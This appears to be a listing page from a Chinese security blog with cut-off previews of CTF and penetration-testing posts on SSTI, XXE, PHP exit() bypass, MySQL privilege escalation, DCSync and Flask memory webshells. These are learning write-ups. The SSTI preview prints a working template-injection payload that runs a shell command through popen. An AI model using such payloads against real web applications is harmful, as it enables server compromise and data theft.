CTFshow SSTI
web361 简单测试一遍 ?name={{7*7}} 回显49证明存在SSTI,是jiaji 无过滤直接上payload吧 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}} 多写几个payload ?name={{lipsum.__glob…
XXE&CTFshow XXE
XXE漏洞概述 XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入 XXE漏洞原理 漏洞成因:解析时未对XML外部实体加以限制,导致攻击者将恶意代码注入到XML中,导致服务器加载恶意的外部实体引发文件读取,SSRF,命令执行等危害操作 特征:在HTTP的Request报文出现一下请求报文,即表明此时是采用XML进行数据传输,就可以测试是否存在XM…
TPCTF_baby layout回看代码分析
baby layout 下载源码: /index.jsimport express from 'express';import session from 'express-session';import rateLimit from 'express-rate-limit';import { randomBytes } from 'crypto';import createDOMPurify fr…
PHP死亡exit()绕过
file_put_contents($filename,”<?php exit();”.$content); 前提就是$filename和$content可控 相对简单来说就是要把<? php exit();给干掉 所以我们要利用php://filter协议可以写入文件 那么原理是什么呢? 通过伪协议把文件当作文本流、非 PHP 代码、压缩文件等其他形式解析,从而避免 PHP 正常解析…
MySQL提权
有师傅问到我相关的问题,我也正好来研究一下 首先了解一下 MySQL数据库提权思路 检测数据库存在,探测端口 获得数据库的权限密码 查看数据库类型 其中获取密码是账号密码是关键 其中拿到权限的方法基本就这几种 3306弱口令爆破 sqlmap的-sql-shell模式 网站的数据库配置文件 1day漏洞获取权限 在我自己的理解就是,利用数据库去提权到服务器 简单来说,就是得先有数据库的访问权限才可…
JAVA基础学习
java基础语法 一个java程序可以认为是一系列对象的集合,而对这些对象通过调用彼此的方法来协同工作 对象:对象是类的一个实例,有状态和行为,比如,一条狗是一个对象,他的状态:颜色。名字,品种等,行为有:摇尾巴,叫等 类:类是一个模版,他描述一类对象的行为和状态 方法:方法就是行为,一个类可以有很多方法,逻辑运算,数据修改以及所有动作都是在方法中完成的 实例变量:每一个对象都有独特的实例变量,对…
DCSync攻击
前言 DCSync是域渗透中经常会用到的 是利用Active Directory(AD)域控制器的复制协议来提取域内用户hash的攻击方式 前置知识 主要需要了解一下内网的工作环境 域 分类:单域、子域、父域、域树、域森林、DNS域名服务器 其中域,是一个有安全边界的计算机组合(集中管理网络资源的逻辑边界) 在一个域里: 所有计算机、用户、打印机、文件服务器等资源都被集中管理 域里有一个或多个“域…
内网代理搭建
正向代理和反向代理 在计算机网络领域,代理服务器扮演着至关重要的角色,它在服务器与客户端之间充当中间人的角色,有效地提高系统的安全性、性能和可扩展性 其中正向代理和反向代理是两种最为常见的代理方式 首先,什么是代理服务器呢?代理服务器就是一个位于客户端和目标服务器之间的中间服务器 换句话说:你不会直接访问目标网站,而是委托代理服务器去帮你访问的 代理服务器的分类 类型说明正向代理用户 → 代理服务…
Flask内存马学习
flask内存马 常用的python框架有django,flask这两者都可能存在ssti漏洞,python内存马利用flask框架中的ssti注入来实现,flask框架中在web应用模版渲染的过程中用到render_template_string进行渲染,但是未对用户输入的代码进行过滤导致用户可以通过注入恶意代码来实现python内存马的注入 前置 钩子函数(hook) 本质是:允许用户在某个特…